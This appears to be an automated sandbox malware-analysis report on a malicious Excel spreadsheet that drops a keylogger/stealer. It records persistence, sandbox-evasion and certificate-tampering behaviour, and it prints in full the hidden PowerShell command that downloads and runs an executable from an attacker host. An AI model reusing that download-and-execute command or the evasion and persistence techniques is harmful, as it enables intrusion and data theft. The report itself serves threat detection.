              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_008E42E0 push 64006FCFh; retf 8_2_008E43FD
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2FA89 pushfd ; retf 8_2_00C2FA95
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2554C push ss; ret 8_2_00C2554D
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C44B48 pushfd ; retf 8_2_00C44B49
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_043235F0 push ecx; retf 8_2_043235F6
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0432363B push es; retf 8_2_04323641
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_04328AB9 push 8C009E0Dh; retf 8_2_04328AC5
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054035A6 push edi; retf 8_2_054035AC
              Source: tmp667.exe.2.drStatic PE information: section name: .text entropy: 7.764858525500812
              Source: svcost.exe.5.drStatic PE information: section name: .text entropy: 7.764858525500812

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\svcost.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp667.exeJump to dropped file

              Boot Survival

              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svcost.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 1C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 2690000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 5F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 5450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 15450000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 310000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 2310000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 940000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\svcost.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4761
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2327
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3828 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3832 Thread sleep count: 218 > 30
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3840 Thread sleep count: 173 > 30
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4016 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4024 Thread sleep count: 198 > 30
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4032 Thread sleep count: 100 > 30
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
              Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_001CECA8 LdrInitializeThunk,5_2_001CECA8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\svcost.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp667.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\svcost.exe Queries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

              [MITRE ATT&CK matrix, flattened in extraction; the per-technique counts are not recoverable.]
              Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
              Techniques shown with a count: Scripting; Exploitation for Client Execution; DLL Side-Loading; Disable or Modify Tools; File and Directory Discovery; Archive Collected Data; Ingress Tool Transfer; Command and Scripting Interpreter; Process Injection; Deobfuscate/Decode Files or Information; System Information Discovery; Encrypted Channel; Scheduled Task/Job; Obfuscated Files or Information; Security Software Discovery; Non-Application Layer Protocol; PowerShell; Registry Run Keys / Startup Folder; Install Root Certificate; Process Discovery; Application Layer Protocol; Software Packing; Virtualization/Sandbox Evasion; Application Window Discovery; Masquerading; Remote System Discovery; Modify Registry
              [Behavior graph, flattened in extraction] Behavior Graph ID: 1562377, Sample: DGTCkacbSz.xlsx, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100
              Graph signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures
              EXCEL.EXE (started): dropped C:\Users\user\Desktop\~$DGTCkacbSz.xlsx (data); signature: Suspicious powershell command line found; started powershell.exe
              powershell.exe: contacted cia.tf 172.67.129.178, 443, 49161 CLOUDFLARENETUS United States; dropped C:\Users\user\AppData\Local\Temp\tmp667.exe (PE32); signatures: Installs new ROOT certificates; Powershell drops PE file; started tmp667.exe
              tmp667.exe: dropped C:\Users\user\AppData\Roaming\svcost.exe (PE32) and C:\Users\user\AppData\Roaming\...\svcost.vbs (ASCII); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Drops VBS files to the startup folder; 2 other signatures
              wscript.exe (started): signature: Windows Scripting host queries suspicious COM object (likely to drop second stage); started svcost.exe
              svcost.exe: signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

              Source | Detection | Scanner | Label | Link
              DGTCkacbSz.xlsx | 39% | ReversingLabs | Script-Macro.Trojan.Snakekeylogger |
              DGTCkacbSz.xlsx | 100% | Avira | VBA/Dldr.Agent.MR |
              DGTCkacbSz.xlsx | 100% | Avira | HEUR/Macro.Downloader.ARIM.Gen |
              DGTCkacbSz.xlsx | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\svcost.exe | 100% | Avira | HEUR/AGEN.1310409 |
              C:\Users\user\AppData\Roaming\svcost.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Temp\tmp667.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Temp\tmp667.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealer |
              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;: | 0% | Avira URL Cloud | safe |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB. | 0% | Avira URL Cloud | safe |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe | 100% | Avira URL Cloud | malware |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile; | 0% | Avira URL Cloud | safe |
              https://cia.tf | 0% | Avira URL Cloud | safe |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t | 0% | Avira URL Cloud | safe |
              http://cia.tf | 0% | Avira URL Cloud | safe |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J | 0% | Avira URL Cloud | safe |
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cia.tf | 172.67.129.178 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.129.178 | cia.tf | United States | 13335 | CLOUDFLARENETUS | true
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1562377
                                                                                        Start date and time:2024-11-25 14:57:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 58s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                        Number of analysed new started processes analysed:12
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:DGTCkacbSz.xlsx
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39(1).xlsx
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winXLSX@8/14@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 93%
                                                                                        • Number of executed functions: 536
                                                                                        • Number of non-executed functions: 32
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .xlsx
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Scroll down
                                                                                        • Close Viewer
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3604 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: DGTCkacbSz.xlsx
Time | Type | Description
05:58:25 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
08:58:03 | API Interceptor | 25x Sleep call for process: powershell.exe modified
08:58:11 | API Interceptor | 176x Sleep call for process: tmp667.exe modified
08:58:33 | API Interceptor | 17x Sleep call for process: wscript.exe modified
08:58:35 | API Interceptor | 99x Sleep call for process: svcost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.129.178 | idk_1.ps1 | malicious | Unknown
172.67.129.178 | FreeCs2Skins.ps1 | malicious | Unknown
172.67.129.178 | Ref#2056119.exe | malicious | AgentTesla, XWorm

Match | Associated Sample Name / URL | Detection | Threat Name | Context
cia.tf | idk_1.ps1 | malicious | Unknown | 172.67.129.178
cia.tf | FreeCs2Skins.ps1 | malicious | Unknown | 172.67.129.178
cia.tf | Ref#2056119.exe | malicious | AgentTesla, XWorm | 172.67.129.178

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | idk_1.ps1 | malicious | Unknown | 172.67.129.178
CLOUDFLARENETUS | FreeCs2Skins.ps1 | malicious | Unknown | 172.67.129.178
CLOUDFLARENETUS | Ref#2056119.exe | malicious | AgentTesla, XWorm | 104.26.13.205
CLOUDFLARENETUS | file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.155.47
CLOUDFLARENETUS | PO#86637.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 104.26.13.205
CLOUDFLARENETUS | 0Xp3q1l7De.exe | malicious | Remcos | 172.64.41.3
CLOUDFLARENETUS | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 104.21.24.198
CLOUDFLARENETUS | CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
CLOUDFLARENETUS | New Purchase Order Document for PO1136908 000 SE.exe | malicious | AgentTesla | 172.67.74.152

Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | OC25-11-24.xls | malicious | Remcos, HTMLPhisher | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | Shipping Document.xls | malicious | HTMLPhisher | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | Dl2EmyL53n.doc | malicious | Unknown | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | solicitud de cotizaci#U00f3n..09.xlam.xlsx | malicious | Unknown | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | kXPgmYpAPg.doc | malicious | Unknown | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | pi-77159.xls | malicious | Remcos, HTMLPhisher | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | PO-000041492.docx.doc | malicious | Lokibot | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | 172.67.129.178
05af1f5ca1b87cc9cc9b25185115607d | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader | 172.67.129.178
                                                                                              No context
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6916
                                                                                              Entropy (8bit):4.765218321768022
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
                                                                                              MD5:665354A1A9139D1FA96E6FCC7F1FCE73
                                                                                              SHA1:8477F42550FBBA457D4015AAAC889272C7FAF1D8
                                                                                              SHA-256:146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
                                                                                              SHA-512:F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):434291
                                                                                              Entropy (8bit):7.997330288407972
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:Kl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv253:K5PBexJJF2cSwG4ofTn53
                                                                                              MD5:DAE027B27EC83FBAEC24D5DFB4847433
                                                                                              SHA1:33BFCDF151B8CBD522256CC5B813549FE5EEB1D1
                                                                                              SHA-256:6C3FF9BA646AF527087B7CA1A9E93C2F06C7C0A4CC1A373C8DA4F0A868C7C319
                                                                                              SHA-512:380F4CD5671F96AFCFAD25E0E2198D7BEFC66A9A5E8715004DA35EB7220CF2FB190EDCB90B7E63F1A734B4862E063B17844D77456930302284953FF153647202
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1072096
                                                                                              Entropy (8bit):7.751716236673022
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:AY2YACYOYGYAAYAtY0YHYAkYAtYJYAAYoYA2YnYAqYDYAHONafeTZce9rlmxTfgX:UfeTZcYhmCBqKzSdG
                                                                                              MD5:2ED7362E959D42385D4E6D231A6840DD
                                                                                              SHA1:B3CC47AC92296D978FC991D9658C771F225DBF18
                                                                                              SHA-256:13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
                                                                                              SHA-512:66553BB74D63E2D8BB47751F87F93DEE66C4ACBE647115DEA5148D6B301F0A6802AE972A3FC26C1BCF9412775F1FBFD6238C1B477F726E0386CDEF183551B758
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
